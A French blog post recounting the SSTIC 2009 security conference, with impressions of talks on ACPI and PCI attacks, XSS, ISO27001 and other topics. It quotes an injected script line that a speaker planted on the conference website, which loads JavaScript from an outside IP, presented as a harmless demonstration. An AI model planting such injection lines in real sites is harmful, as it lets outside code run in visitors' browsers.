• La 7e édition du SSTIC s'est tenue à Rennes les 3, 4 et 5 juin derniers.

• Comme les années précédentes, il ne fallait pas traîner pour réserver sa place : beaucoup d'appelants pour peu d'élus et, rançon du succès, sûrement beaucoup de déçus qui se consoleront cependant à la lecture des actes dès qu'ils seront en ligne.

• Résultat cette année encore, le taux de remplissage de l'amphi Louis Antoine n'avait rien à envier à celui des prisons françaises : 350 places, 450 occupants.

• Les quelques habitués auront reconnu, aux dates près, les lignes qui précèdent : elles sont copiées/collées du CR de l'an dernier. Je voulais faire vite - trop - pour apparaitre en bonne position dans la liste officielle des compte-rendus du SSTIC, mais Epic Fail, aucune référence sur la guide du routard de la sécurité une semaine après l'évènement ! Arf…

• Inutile, en conséquent, de dérouler tout l'agenda jour par jour. J'invite les lecteurs à surveiller le contenu du dépôt des Actes SSTIC et à se ruer dessus dès l'apparition d'un répertoire SSTIC09. Je vous livre donc plus des impressions générales.

• J'arrête là mon copier/coller avant que ça ne se voit trop et, comme le dirait Nicolas, place au feedback.

• Départ de Paris à 07h00, arrivée à Beaulieu à 10h00, trop tard pour le café et la première moitié de la KeyNote d'ouverture mais assez tôt pour en savourer la fin, et, surtout, avec une bonne heure et demi d'avance sur les deux collègues qui avaient pris le RER TGV.

• Beaucoup de têtes connues, dans l'assistance comme sur “scène”, il y a les habitués et les habituelles.

• Quelques mots sur les actes Papier :

1. Cette année c'est l'ESIEA qui a joué le rôle de l'imprimeur. Au revoir, donc, le logo Armée de Terre des actes made by ESAT.
2. Dans le nuage de tags de la première de couverture, il manque les mots “bgp”, “hadopi” et “loppsi”.
3. Si 7 est le nombre de nains de Blanche-Neige et d'occurences du SSTIC, c'est aussi, à peu de choses, le nombre de filles dans l'amphi., la qualité primant cependant sur la quantité.
4. En pinaillant on pourrait contesté le nombre de pages en intégrant aux 563 annoncées les pages blanches non numérotées.
5. Oui, c'est long, une nuit d'hotel sans WiFi, on a le temps de feuilleter les actes, du coup.

• Un SSTIC plutôt bas-niveau cette année, avec des sujets qui font passer l'assembleur pour un langage haut-niveau sinon compréhensible. Je pense en particulier à l'attaque ACPI que l'on peut résumer (très grossièrement) à :

 login: loic
 password: *****
 $ whoami
 loic
 beep beep beep
 $ whoami
 root
 

Heureusement que cette démo ne fonctionne pas sur Dell, j'aurais été root sans le savoir un bon nombre de fois étant donné que mon voisin avait oublié son alim' et emprunté sans vergogne la mienne (ledit voisin étant aussi mon chef, difficile de lui refuser ce service ). A titre pûrement personnel je me serai très bien contenté de la démo. Même remarque pour la présentation qui suivit sur les attaques PCI : excellente quoiqu'un peu dur à digérer pour mes neurones. Pour peu j'ai failli regretter les confs de N. Brulez…

• Mention spéciale pour la présentation d'Alexandre Fernandez-Toro sur l'ISO27001. Je retiens que cette norme est un formidable accélérateur de carrière.

• Une très bonne surprise : le traçage des traitres en multimédia. Ca sentait le sujet sinon polémique tout au moins savonneux, mais finalement, en ce qui me concerne, une des meilleures présentations de cette édition. Et un orateur hors pair. Si si, sincèrement.

• Autre très bonne surprise : la présentation des attaques XSS. On notera ceci :

  // Bien joué !! Si vous êtes arrivé(e) jusque là, c'est que vous avez repéré l'injection réalisée sur
 le programme en ligne du SSTIC 09.
// Ce script ne présente pas de code hostile.
// Il pourrait être également intéressant de savoir combien d'entre vous sont remontés jusqu'à ce script
. 
// Si vous lisez ce message, vous pouvez simplement m'adresser un message à pierre.gardenat/at/ac-rennes
.fr pour m'indiquer
// que vous avez repéré l'injection.
// Bon SSTIC à tous !

// Pierre Gardenat
document.write("<script src=http://195.221.67.46/_fichiers_/ssi/admin/A/psstic.js ></script>");
  

Eh oui, le site du SSTIC était piégé depuis un bout de temps. Ceci dit, pour faire mon mauvais perdant, l'URL vers un domaine académique rennais n'aurait peut-être pas fait “tilt”.

• Un grand Hourra à la conf' sur les émanations compromettantes, à l'intervention de Nicolas Ruff (c'est à se demande pourquoi il fut recalé l'an dernier !).
• Un grand Bravo pour la subtile - et voulue ? - réorganisation des conférences et à leur regroupement par thèmes (Fuzzing, attaques matérielles), seul accroc : la piégeage de carte Java le mardi et la backdoor JavaEE vendredi.
• Concernant les Rumps, 21 selon la police, 23 selon les organisateurs, une suggestion : les répartir sur les deux premiers jours histoire d'avoir le temps de les digérer et, pour certaines, de dessaouler.
• Dernière suggestion : prévoir un budget “Traduction” des actes en anglais, histoire que des confs présentées in french only à SSTIC ne se retrouve pas en tête de gondole quelques mois plus tard quand elles ressortent dans une conf' internationale. Toute ressemblance avec du cassage de mot de passe sur PlayStation, etc., etc.

• Un grand bravo aux organisateurs pour le Social Event de cette année : ex-cel-lent ! Il eut suffi d'inviter un orchestre de chambre ou un trio de jazz pour atteindre le nirvana.
• Par charité chrétienne je ne citerai pas le nom de l'hotel qui ose en 2009 faire payer le WiFi et louer des chambres sans eau chaude le premier soir après 22h00, mais à la place de Mercure je ne serais pas fiérot. Mais non je n'ai pas dit “Free” !

• http://sid.rstack.org/blog/index.php/347-sstic-2009-en-direct-ou-presque
• http://sylvain-maret.blogspot.com/
• http://nonop.blogspot.com/2009/06/sstic-09.html